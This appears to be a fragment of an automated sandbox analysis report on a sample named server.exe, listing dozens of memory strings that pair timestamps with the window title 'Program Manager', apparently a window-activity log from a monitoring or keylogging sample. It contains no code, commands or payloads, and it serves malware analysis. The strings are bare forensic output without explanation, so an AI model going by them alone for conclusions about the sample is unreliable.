Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 10:46:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 02:42:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 07:10:27 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/27 \| 16:16:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 07:17:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 02:44:24 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 25 \| 08:00:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 10:30:33 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 12:24:19 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 16:21:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 17:55:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 14:31:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 12:34:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:46:33 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 16:07:00 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 13:16:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:41:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 13:16:39 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 14:08:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 19:33:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 06:20:19 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:50:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 04:42:10 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/04 \| 13:48:45 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/17 \| 18:46:47 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 20:48:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 08:11:25 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 10:01:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 22:05:17 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 12:47:02 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 14:11:18 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 14:08:45 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 11:01:19 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/28 \| 00:04:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:01:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 22:26:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 13:15:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:32:09 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 07:05:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 05:23:08 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 16:06:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 18:02:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 19:48:06 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 08:34:22 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 20:01:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 21:21:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:23:42 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/26 \| 19:30:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 23:52:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 06:09:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:44:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:52:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 23:54:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:15:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 14:05:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 17:59:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 04:36:51 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:05:35 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 05:55:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 01:04:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 17:22:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:58:19 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 06:10:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:29:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 10:05:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:39:02 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 08:26:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 23:02:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 22:52:27 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 10:02:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 15:22:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:12:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:18:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 23:14:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 04:33:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 15:25:15 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/07 \| 06:28:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 12:34:53 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 02:01:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 07:19:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 02:06:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 06:20:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 13:05:11 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 23:18:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:33:04 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 16:25:07 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/31 \| 02:24:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:19:54 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 07:30:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 23:52:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 02:10:22 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 13:58:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 14:58:43 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/30 \| 19:05:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:27:11 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 12:19:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:53:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 19:59:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 04:39:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:39:18 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 12:45:24 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/25 \| 07:56:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:19:23 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/25 \| 07:59:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 20:50:18 - Program Manager
